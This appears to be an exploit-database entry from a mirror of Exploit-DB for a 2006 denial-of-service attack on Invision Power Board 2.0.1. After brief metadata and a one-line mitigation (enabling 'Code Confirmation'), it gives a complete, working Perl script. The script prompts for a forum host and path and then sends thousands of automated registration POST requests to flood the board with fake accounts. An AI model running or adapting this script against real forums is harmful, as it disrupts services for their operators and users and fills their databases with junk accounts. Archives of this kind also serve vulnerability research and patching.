header-logo
Suggest Exploit
vendor:
Invision Power Board
by:
SkOd
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Invision Power Board
Affected Version From: IPB 2.0.1
Affected Version To: IPB 2.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

IPB Register Multiple Users Denial of Service

This exploit allows an attacker to register multiple users on Invision Power Board (IPB) forums, resulting in a denial of service. It does not work on forums using 'Code Confirmation'.

Mitigation:

Enabling 'Code Confirmation' on the forum can prevent this attack.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use IO::Socket;
##########################################################
##		 _______ _______ ______ 		 #
##		 |______ |______ |     \		 #
##		 ______| |______ |_____/		 #
##		                        		 #
##IPB Register Multiple Users Denial of Service	   	 #
##Doesn't Work on forums using "Code Confirmation"	 #
##Created By SkOd                                        #
##SED security Team                                      #
##http://www.sed-team.be                                 #
##skod.uk@gmail.com                                      #
##ISRAEL                                                 #
##########################################################

print q{
############################################################
#        Invision Power Board Multiple Users DOS	   #
#		Tested on IPB 2.0.1			   #
#	    created By SkOd. SED Security Team             #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]

Navigation

Suggest Exploit

Services By CQR